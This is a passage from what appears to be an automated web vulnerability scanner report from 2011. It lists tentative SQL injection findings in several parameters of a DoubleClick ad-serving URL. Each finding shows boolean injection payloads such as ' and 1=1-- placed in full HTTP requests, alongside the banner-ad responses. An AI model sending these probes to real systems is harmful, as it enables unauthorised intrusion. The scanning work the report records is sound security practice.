Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5449

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/Promotions_0416-0430_Branding-1Ton_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0417-_-0430");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/z%3B240123949%3B0-0%3B0%3B61055221%3B4307-300/250%3B41761562/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=124
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d1--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:02:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn'%20and%201%3d2--%20&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The orh parameter appears to be vulnerable to SQL injection attacks. The payloads 22418465'%20or%201%3d1--%20 and 22418465'%20or%201%3d2--%20 were each submitted in the orh parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5576

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d1--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/126/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Es
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 848

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/k;239957923;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=22418465'%20or%201%3d2--%20&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.5. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pg parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pg parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d1--%20&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg='%20and%201%3d2--%20&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The pt parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the pt parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 841

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d1--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
